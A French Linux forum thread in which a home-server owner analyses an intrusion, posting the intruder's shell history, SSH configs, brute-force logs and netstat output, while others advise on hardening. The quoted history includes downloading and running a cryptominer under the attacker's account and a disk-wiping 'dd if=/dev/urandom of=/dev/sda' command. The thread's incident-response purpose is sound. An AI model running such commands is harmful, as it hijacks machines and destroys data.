Ce site est optimisé pour être consulté depuis un navigateur moderne dans lequel JavaScript est activé.

Petite intrusion - j'ai besoin d'analyse

fredsaule

Bonjour,

Hier soir, je me suis connecté sur mon serveur personnel (à domicile) et j'ai eu la surprise de voir le fond d'écran changé (l'image n'était pas dans mes goûts esthétiques).

J'ai un petit serveur à la maison, j'y accède avec tightvnc et ssh en complément (je ne fais pas de tunneling, mais je le mets en place ce matin).

Je ne sais pas précisément comment le pirate s'est introduit dans ma machine, mais il n'avait visiblement pas trouvé mon passwd. En témoigne ce que dit "history" :

304 cat /proc/cpuinfo
305 id
306 ps aux
307 cat /proc/cpuinfo
308 df
309 df -h
310 lscpu
311 top c
312 sudo su
313 dpkg
314 wget minergate.com/download/deb-cli
315 dpkg -x deb-cli .deb
316 cd .deb/opt/minergate-cli/
317 ./minergate-cli
318 ./minergate-cli -user alekx12555@mail.ru -bcn
319 screen ~~
320 ./minergate-cli -user alekx12555@mail.ru -bcn
321 sudo dd if=/dev/urandom of=/dev/sda count=512

Je n'identifie pas certaines commandes...Notamment :
_ minergate-cli semble être en relation avec les bitcoins.
_ deb-cli m'est inconnu aussi
_ screen ~~, connait pas
_ par contre la dernière commande (qui n'a pas marché car il n'a pas trouvé mon mdp) me semble très offensive (sudo dd if=/dev/urandom of=/dev/sda count=512)

J'ai bien évidemment coupé le NAT qui mène à mon port VNC car je suppose qu'il est entré par là. J'ai changé mon passwd (au cas où).

Je cherche des solutions pour savoir quels sont les ports ouverts sur ma machine et comment sécuriser mon accès (en graphique évidemment).

Merci pour vos conseils.

Fredsaule

pitmix

Bonjour
Je ne sais pas si ça peux t'aider car je ne suis pas un expert mais il y a un site pour tester ton firewall. Il te dira quel port est ouvert.
http://www.zebulon.fr/outils/scanports/test-securite.php

"sudo dd if" n'est ce pas pour cloner ton disque dur ?

Nasman

Vu la logique des instructions passées, il semble qu'il devait avoir les droits sudo car après le sudo su (qui fait passer en root - et qui ne demande plus de mot de passe par la suite) apparaissent des instructions pour télécharger puis installer le programme ./minergate-cli
Je pense que s'il s'était fait jeter, il n'aurait pas poursuivi la manœuvre (à moins que ce soit un script qui faisait tout cela machinalement).

A priori la dernière commande devait effacer les 512 premiers secteurs (de 512 octets - option de bs par défaut) du disque

PS: comment te connectes tu par ssh à ton serveur, par clé ou par mot de passe ?

fredsaule

Bonjour,

Je me connecte en ssh par passwd (pas par clé) et aussi en direct par tightvnc (ce n'est plus vrai à présent car je fais du tunnel).

Je ne pense pas qu'il avait root pour 3 raisons :
_ la dernière commande n'a (à priori) pas marché sinon ma partition serait morte (j'ai rebooté hier sans problème).
_ L'autre aspect c'est que j'ai fait "history" en root et que rien n'est sorti.
_ j'ai retrouvé les reliquats d'installation dans /home/<mon user>, pas dans /root ou ailleurs.

Merci,
Fredsaule

fredsaule

Merci, c'est pas mal comme site !

Fredsaule

pitmix a écritBonjour
Je ne sais pas si ça peux t'aider car je ne suis pas un expert mais il y a un site pour tester ton firewall. Il te dira quel port est ouvert.
http://www.zebulon.fr/outils/scanports/test-securite.php

"sudo dd if" n'est ce pas pour cloner ton disque dur ?

pires57

"sudo dd if" n'est ce pas pour cloner ton disque dur ?

Effectivement, dans le contexte présent ce n'est pas une histoire de clone de disque.
Dans le cas présent on remplace le contenu des 512 premier octets de /dev/sda par le contenu de /dev/urandom.
Grossièrement cela reviens à supprimer le contenu de ton MBR ainsi que celui de ta table des partitions.

Pourrais tu retourner :
- le fichier de config de ton SSH
- le fichier de log SSH
- le retour des commandes :

netstat -tanu

top

dpkg --get-selections |grep minergate*

Tu as de la chance qu'il n'ai pas eu les droits root pour la dernière commande.

Nasman

La syntaxe de dd est la suivante :
if= origine du fichier source, /dev/urandom générateur de nombre aléatoires
of= destination des blocs, ici ton disque dur sda
bs= taille d'un bloc de données, par défaut 512 octets
count= nombre de blocs traités, ici 512 blocs (de 512 octets), donc effacerait le mbr et les 511 secteurs suivants (dont le bloc à la LBA=1 qui peut contenir core.img, ou les entête gpt...)
skip= nombre de bloc sautée sur la source
seek= nombre de blocs sautés sur la destination

Si la commande avait été effective, ton système n'aurait pu être lancé mais il est possible de réaccéder à la partition système si cette dernière était alignée au mio (2048 secteurs de 512 octets). Avec un alignement au cylindre, les partitions commençant avant le 512ème secteur (adresse LBA) auraient été détruites définitivement.

fredsaule

Voici les éléments demandés :

- le fichier de config de ton SSH

Host *
#   ForwardAgent no
#   ForwardX11 no
#   ForwardX11Trusted yes
#   RhostsRSAAuthentication no
#   RSAAuthentication yes
#   PasswordAuthentication yes
#   HostbasedAuthentication no
#   GSSAPIAuthentication no
#   GSSAPIDelegateCredentials no
#   GSSAPIKeyExchange no
#   GSSAPITrustDNS no
#   BatchMode no
#   CheckHostIP yes
#   AddressFamily any
#   ConnectTimeout 0
#   StrictHostKeyChecking ask
#   IdentityFile ~/.ssh/identity
#   IdentityFile ~/.ssh/id_rsa
#   IdentityFile ~/.ssh/id_dsa
#   IdentityFile ~/.ssh/id_ecdsa
#   IdentityFile ~/.ssh/id_ed25519
#   Port 22
#   Protocol 2
#   Cipher 3des
#   Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc
#   MACs hmac-md5,hmac-sha1,umac-64@openssh.com,hmac-ripemd160
#   EscapeChar ~
#   Tunnel no
#   TunnelDevice any:any
#   PermitLocalCommand no
#   VisualHostKey no
#   ProxyCommand ssh -q -W %h:%p gateway.example.com
#   RekeyLimit 1G 1h
    SendEnv LANG LC_*
    HashKnownHosts yes
    GSSAPIAuthentication yes
    GSSAPIDelegateCredentials no

- le fichier de log SSH (de la période supposée de l'intrusion) :

Sep 29 10:05:08 gevara sshd[7035]: Disconnected from 221.194.47.229 port 33058 [preauth]
Sep 29 10:05:08 gevara sshd[7035]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.194.47.229  user=root
Sep 29 10:05:13 gevara sshd[7037]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.194.47.229  user=root
Sep 29 10:05:14 gevara sshd[7037]: Failed password for root from 221.194.47.229 port 35103 ssh2
Sep 29 10:05:17 gevara sshd[7037]: Failed password for root from 221.194.47.229 port 35103 ssh2
Sep 29 10:05:18 gevara sshd[7039]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.229.172.76  user=root
Sep 29 10:05:19 gevara sshd[7039]: Failed password for root from 221.229.172.76 port 30319 ssh2
Sep 29 10:05:19 gevara sshd[7037]: Failed password for root from 221.194.47.229 port 35103 ssh2
Sep 29 10:08:57 gevara dbus[525]: [system] Failed to activate service 'org.bluez': timed out
Sep 29 10:09:19 gevara sshd[7311]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.249.54.88  user=root
Sep 29 10:09:21 gevara sshd[7311]: Failed password for root from 119.249.54.88 port 49429 ssh2
Sep 29 10:09:26 gevara sshd[7311]: message repeated 2 times: [ Failed password for root from 119.249.54.88 port 49429 ssh2]
Sep 29 10:09:27 gevara sshd[7311]: Received disconnect from 119.249.54.88 port 49429:11:  [preauth]
Sep 29 10:09:27 gevara sshd[7311]: Disconnected from 119.249.54.88 port 49429 [preauth]
Sep 29 10:09:27 gevara sshd[7311]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.249.54.88  user=root
Sep 29 10:09:29 gevara sshd[7335]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.249.54.88  user=root
Sep 29 10:09:31 gevara sshd[7335]: Failed password for root from 119.249.54.88 port 55541 ssh2
Sep 29 10:09:36 gevara sshd[7335]: message repeated 2 times: [ Failed password for root from 119.249.54.88 port 55541 ssh2]
Sep 29 10:09:37 gevara sshd[7335]: Received disconnect from 119.249.54.88 port 55541:11:  [preauth]
Sep 29 10:09:37 gevara sshd[7335]: Disconnected from 119.249.54.88 port 55541 [preauth]
Sep 29 10:09:37 gevara sshd[7335]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.249.54.88  user=root
Sep 29 10:09:39 gevara sshd[7355]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.249.54.88  user=root
Sep 29 10:09:41 gevara sshd[7355]: Failed password for root from 119.249.54.88 port 34660 ssh2
Sep 29 10:15:44 gevara sshd[7474]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.229.172.76  user=root
Sep 29 10:15:45 gevara sshd[7474]: Failed password for root from 221.229.172.76 port 39707 ssh2
Sep 29 10:15:50 gevara sshd[7474]: message repeated 2 times: [ Failed password for root from 221.229.172.76 port 39707 ssh2]
Sep 29 10:15:50 gevara sshd[7474]: Received disconnect from 221.229.172.76 port 39707:11:  [preauth]
Sep 29 10:15:50 gevara sshd[7474]: Disconnected from 221.229.172.76 port 39707 [preauth]

et visiblement les tests pour entrer son toujours en cours :

Sep 30 10:51:13 gevara sshd[9748]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.229.172.76  user=root
Sep 30 10:51:14 gevara sshd[9750]: Failed password for root from 121.18.238.109 port 42139 ssh2
Sep 30 10:51:17 gevara sshd[9750]: Failed password for root from 121.18.238.109 port 42139 ssh2
Sep 30 10:51:17 gevara sshd[9750]: Received disconnect from 121.18.238.109 port 42139:11:  [preauth]
Sep 30 10:51:17 gevara sshd[9750]: Disconnected from 121.18.238.109 port 42139 [preauth]
Sep 30 10:51:17 gevara sshd[9750]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=121.18.238.109  user=root
Sep 30 10:51:21 gevara sshd[9754]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=121.18.238.109  user=root
Sep 30 10:51:23 gevara sshd[9754]: Failed password for root from 121.18.238.109 port 33234 ssh2
Sep 30 10:51:41 gevara sshd[9762]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.229.172.76  user=root
Sep 30 10:51:43 gevara sshd[9762]: Failed password for root from 221.229.172.76 port 41063 ssh2

(fort heureusement, mon root est inaccessible)

- le retour des commandes :

netstat -tanu

Connexions Internet actives (serveurs et établies)
Proto Recv-Q Send-Q Adresse locale          Adresse distante        Etat
tcp        0      0 0.0.0.0:9091            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:5902            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6002            0.0.0.0:*               LISTEN
tcp        0      0 127.0.1.1:53            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:51413           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 192.168.0.11:51413      208.59.172.218:63746    TIME_WAIT
tcp        0      0 192.168.0.11:51413      79.70.37.215:64353      TIME_WAIT
tcp        0      0 192.168.0.11:51413      112.206.104.223:56884   TIME_WAIT
tcp        0      0 192.168.0.11:51413      208.59.172.218:63742    TIME_WAIT
tcp        0      0 192.168.0.11:40786      207.66.141.182:443      CLOSE_WAIT
tcp        1      0 192.168.0.11:40802      207.66.141.182:443      CLOSE_WAIT
tcp        0      0 192.168.0.11:51413      5.13.167.119:2292       TIME_WAIT
tcp        0      0 192.168.0.11:57992      104.20.40.187:80        ESTABLISHED
tcp        0      1 192.168.0.11:51413      89.140.204.131:4485     FIN_WAIT1
tcp        0    256 192.168.0.11:22         192.168.0.254:53796     ESTABLISHED
tcp        0      0 192.168.0.11:51413      197.149.178.174:64423   TIME_WAIT
tcp6       0      0 :::5900                 :::*                    LISTEN
tcp6       0      0 :::51413                :::*                    LISTEN
tcp6       0      0 :::22                   :::*                    LISTEN
udp        0      0 0.0.0.0:5353            0.0.0.0:*
udp        0      0 0.0.0.0:47015           0.0.0.0:*
udp        0      0 127.0.1.1:53            0.0.0.0:*
udp        0      0 0.0.0.0:68              0.0.0.0:*
udp        0      0 192.168.0.11:123        0.0.0.0:*
udp        0      0 127.0.0.1:123           0.0.0.0:*
udp        0      0 0.0.0.0:123             0.0.0.0:*
udp        0      0 0.0.0.0:51413           0.0.0.0:*
udp6       0      0 fe80::d869:80da:6bc:123 :::*
udp6       0      0 ::1:123                 :::*
udp6       0      0 :::123                  :::*

top

top - 10:54:04 up 13:07,  2 users,  load average: 0,03, 0,04, 0,00
Tâches: 156 total,   1 en cours, 155 en veille,   0 arrêté,   0 zombie
%Cpu(s):  2,8 ut,  0,3 sy,  0,1 ni, 96,8 id,  0,0 wa,  0,0 hi,  0,0 si,  0,0 st
KiB Mem :  4029024 total,   644600 libr,   979972 util,  2404452 tamp/cache
KiB Éch: 19530748 total, 19527960 libr,     2788 util.  2694648 dispo Mem

  PID UTIL.     PR  NI    VIRT    RES    SHR S  %CPU %MEM    TEMPS+ COM.
 9857 fredsau+  20   0   41992   3992   3312 R  11,8  0,1   0:00.02 top
    1 root      20   0  119924   6080   4000 S   0,0  0,2   0:23.07 systemd
    2 root      20   0       0      0      0 S   0,0  0,0   0:00.00 kthreadd
    3 root      20   0       0      0      0 S   0,0  0,0   0:00.06 ksoftirqd/0
    5 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 kworker/0:0H
    7 root      20   0       0      0      0 S   0,0  0,0   0:13.02 rcu_sched
    8 root      20   0       0      0      0 S   0,0  0,0   0:00.00 rcu_bh
    9 root      rt   0       0      0      0 S   0,0  0,0   0:00.03 migration/0
   10 root      rt   0       0      0      0 S   0,0  0,0   0:00.16 watchdog/0
   11 root      rt   0       0      0      0 S   0,0  0,0   0:00.17 watchdog/1
   12 root      rt   0       0      0      0 S   0,0  0,0   0:00.04 migration/1
   13 root      20   0       0      0      0 S   0,0  0,0   0:00.42 ksoftirqd/1
   15 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 kworker/1:0H
   16 root      rt   0       0      0      0 S   0,0  0,0   0:00.16 watchdog/2
   17 root      rt   0       0      0      0 S   0,0  0,0   0:00.03 migration/2
   18 root      20   0       0      0      0 S   0,0  0,0   0:00.12 ksoftirqd/2
   20 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 kworker/2:0H
   21 root      rt   0       0      0      0 S   0,0  0,0   0:00.09 watchdog/3
   22 root      rt   0       0      0      0 S   0,0  0,0   0:00.03 migration/3
   23 root      20   0       0      0      0 S   0,0  0,0   0:00.07 ksoftirqd/3
   25 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 kworker/3:0H
   26 root      20   0       0      0      0 S   0,0  0,0   0:00.00 kdevtmpfs
   27 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 netns
   28 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 perf
   29 root      20   0       0      0      0 S   0,0  0,0   0:00.04 khungtaskd
   30 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 writeback
   31 root      25   5       0      0      0 S   0,0  0,0   0:00.00 ksmd
   32 root      39  19       0      0      0 S   0,0  0,0   0:01.18 khugepaged
   33 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 crypto
   34 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 kintegrityd
   35 root       0 -20       0      0      0 S   0,0  0,0   0:00.00 bioset

dpkg --get-selections |grep minergate*

La commande ne rend rien

Merci,
Fredsaule

bruno

Bonjour,

Tout d'abord si tu as une suspicion d'intrusion et que tu ne sais pas jusqu'où l'intrus a pu aller, il faut réinstaller complètement le système. Si tu veux poursuivre l'analyse de l'intrusion il faut déconnecter le serveur du réseau.

Visiblement l'intrus a simplement essayé d'installer un mineur de monnaie virtuelle (Bitcoin ou autre). Il n'était pas très doué puisqu'il a laissé ses commandes visibles dans l'historique, alors qu'il est extrêmement simple de faire en sorte que les commandes tapées ne soient pas enregistrées. Le « sudo su » ne plaide pas non plus en la faveur d'un hackeur de haut vol 😉. Mais cela ne veut pas dire qu'il n'a pas commis d'autre dégâts par la suite…

D'un point de vue sécurité un accès VNC depuis l'Internet c'est très risqué (de toute façon un « serveur » ne devrait pas avoir d'interface graphique…). À éviter donc, ou à limiter strictement à certaines IP à travers un tunnel SSH et/ou au réseau local.

L'accès ssh peut être ouvert sur l'Internet à condition de le sécuriser un minimum : mot de passe très fort et/ou mieux accès par clé (RSA 4096 bits ou ed25519).

EDIT : si tu veux nous montrer ta configuration ssh, c'est le fichier sshd_config qu'il faut donner…

fredsaule

Bonjour,

Merci pour ce retour - je comprends (avec un peu de retard) que tightvnc n'est pas sécure du tout.

Voici le fichier de configuration ssh:

# Package generated configuration file
# See the sshd_config(5) manpage for details

# What ports, IPs and protocols we listen for
Port 22
# Use these options to restrict which interfaces/protocols sshd will bind to
#ListenAddress ::
#ListenAddress 0.0.0.0
Protocol 2
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
HostKey /etc/ssh/ssh_host_ecdsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
#Privilege Separation is turned on for security
UsePrivilegeSeparation yes

# Lifetime and size of ephemeral version 1 server key
KeyRegenerationInterval 3600
ServerKeyBits 1024

# Logging
SyslogFacility AUTH
LogLevel INFO

# Authentication:
LoginGraceTime 120
PermitRootLogin prohibit-password
StrictModes yes

RSAAuthentication yes
PubkeyAuthentication yes
#AuthorizedKeysFile     %h/.ssh/authorized_keys

# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# For this to work you will also need host keys in /etc/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
#IgnoreUserKnownHosts yes

# To enable empty passwords, change to yes (NOT RECOMMENDED)
PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Change to no to disable tunnelled clear text passwords
#PasswordAuthentication yes

# Kerberos options
#KerberosAuthentication no
#KerberosGetAFSToken no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes

X11Forwarding yes
X11DisplayOffset 10
PrintMotd no
PrintLastLog yes
TCPKeepAlive yes
#UseLogin no

#MaxStartups 10:30:60
Banner /etc/issue.net

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

Subsystem sftp /usr/lib/openssh/sftp-server

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

GatewayPorts yes

Cdt,
Fredsaule

jplemoine

Et perso, pour augmenter la sécurité sans trop galérer :
je mettrais, si ce n'est pas déjà faut, fail2ban : ça permet de limiter les attaques type brut-force ou dictionnaire.
Et une double authentification (type OTP) sur le ssh mais pas le log direct sur la machine.

fredsaule

jplemoine a écritEt perso, pour augmenter la sécurité sans trop galérer :
je mettrais, si ce n'est pas déjà faut, fail2ban : ça permet de limiter les attaques type brut-force ou dictionnaire.
Et une double authentification (type OTP) sur le ssh mais pas le log direct sur la machine.

Fail2ban est présent et je suis en train de le tuner pour blacklister les indélicats.

Merci,
Fredsaule

pires57

Alors :

Tu as pas mal de service en écoute (LISTEN). (22 SSH / 5900 , 5902, 6002 (X)VNC / 9091, 51413 Transmission.
Un serveur ne devrait pas avoir d'interface graphique, je te recommande donc également de réinstaller ton système et de le configurer comme un vrai serveur.
En ce qui concerne fail2ban tu peut le configurer avec des multijails (exemple : 3 echec = banni 5 minute, si de nouveau un échec dans l'heure suivant le deban banni 1h ... )
En ce qui concerne SSH tu devrait le reconfigurer pour n'accepter que les authentifications par clé. tu généres un couple de clé en RSA 4096, cela devrait être suffisant.
Ton mot de passe est complexe ? combien de caractère? majuscule , minuscule chiffre et caractère spéciaux?
si ton mot de passe fait parti d'un dictionnaire il est possible qu'il soit entré de cette manière.

fredsaule

Merci pour tes conseils.
J'ai déjà rallongé et complexifié mon mot de passe.
Je ne comprends pas comment autant d'IP peuvent me cibler (j'ai fait du ménage à la main avec iptable DROP)

Je te rejoins sur le fait de ne pas avoir d'interface graphique distante, néanmoins je reste attaché à la session X.

Je vais voir.

Cdt,
Fredsaule

pires57 a écritAlors :

Tu as pas mal de service en écoute (LISTEN). (22 SSH / 5900 , 5902, 6002 (X)VNC / 9091, 51413 Transmission.
Un serveur ne devrait pas avoir d'interface graphique, je te recommande donc également de réinstaller ton système et de le configurer comme un vrai serveur.
En ce qui concerne fail2ban tu peut le configurer avec des multijails (exemple : 3 echec = banni 5 minute, si de nouveau un échec dans l'heure suivant le deban banni 1h ... )
En ce qui concerne SSH tu devrait le reconfigurer pour n'accepter que les authentifications par clé. tu généres un couple de clé en RSA 4096, cela devrait être suffisant.
Ton mot de passe est complexe ? combien de caractère? majuscule , minuscule chiffre et caractère spéciaux?
si ton mot de passe fait parti d'un dictionnaire il est possible qu'il soit entré de cette manière.